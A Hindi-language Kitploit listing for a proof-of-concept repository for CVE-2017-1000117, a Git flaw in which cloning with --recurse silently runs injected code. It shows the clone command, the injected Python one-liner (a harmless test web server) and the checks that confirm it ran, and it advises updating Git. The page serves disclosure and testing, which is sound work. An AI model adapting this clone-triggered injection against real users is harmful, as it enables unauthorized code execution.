Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-1000117-test — CVE-2017-1000117 का सत्यापन | Kitploit
उपकरण/GitHubGitHub/shadow5523/cve-2017-1000117-test
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubshadow5523/cve-2017-1000117-test

CVE-2017-1000117-test

CVE-2017-1000117 का सत्यापन

रिपॉजिटरी देखें
9 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

संचालन विवरण

यह CVE-2017-1000117 भेद्यता पर काम करता है। इस रिपॉजिटरी को root विशेषाधिकारों के साथ git कमांड में --recurse विकल्प देकर क्लोन करने पर, यह अपने आप 12345 पोर्ट पर सुनने वाला http सर्वर चला देता है।
http सर्वर को रोकने के लिए प्रक्रिया क्रमांक (PID) ढूंढें और kill करें।

जिन OS पर काम करने की पुष्टि हुई

CentOS7
macOS Sierra
Debian8

निष्पादन कमांड

निम्नलिखित कमांड चलाएँ। पूरा होने पर कंसोल रुक जाएगा, इसलिए Ctrl + C से बाहर निकलें।

root@kitploit:~
    [root@localhost ~]$ git clone --recurse https://github.com/Shadow5523/CVE-2017-1000117-test.git

भेद्यता सत्यापन विधि

  1. ps कमांड चलाकर जाँचें कि Python कोड चल रहा है या नहीं।
root@kitploit:~
    [root@localhost ~]$ ps ax | grep http
    21365 pts/0    S      0:00 python -c (lambda j: (lambda s, i: s.setsockopt(i.SOL_SOCKET, i.SO_REUSEADDR, 1) or s.bind((i.gethostname(), 12345)) or s.listen(10) or map(lambda y: y.send("HTTP/1.0 200 OK\r\nContent-Length: 20\r\nContent-Type: text/html\r\n\r\n<html><center>test</center></html>"), (s.accept()[0] for x in iter(int, 1))))(j.socket(j.AF_INET, j.SOCK_STREAM), j))(__import__("socket"))
    21381 pts/0    S+     0:00 grep --color=auto ht

  1. netstat से जाँचें कि 12345 पोर्ट सुन रहा है या नहीं।
root@kitploit:~
    [root@localhost ~]$ netstat -tanp | grep 12345
    tcp        0      0 127.0.0.1:12345         0.0.0.0:*               LISTEN      21365/python

macOS पर निम्नलिखित कमांड से जाँचें:

root@kitploit:~
    MAcbook:~ root# lsof -nP -iTCP -sTCP:LISTEN
    COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
    Python  14231 root    3u  IPv4 0xa3955f2183c66251      0t0  TCP 127.0.0.1:12345 (LISTEN)
  1. /etc/hosts की अंतिम पंक्ति में "127.0.0.1 होस्टनाम" जोड़ा गया है या नहीं, यह जाँचें।

उपाय

Git को नवीनतम संस्करण में अपडेट करें। नीचे दिए गए लिंक देखें।
GitHub रिमोट रिपॉजिटरी से नवीनतम Git में अपडेट करने की विधि

टूल डाउनलोड करें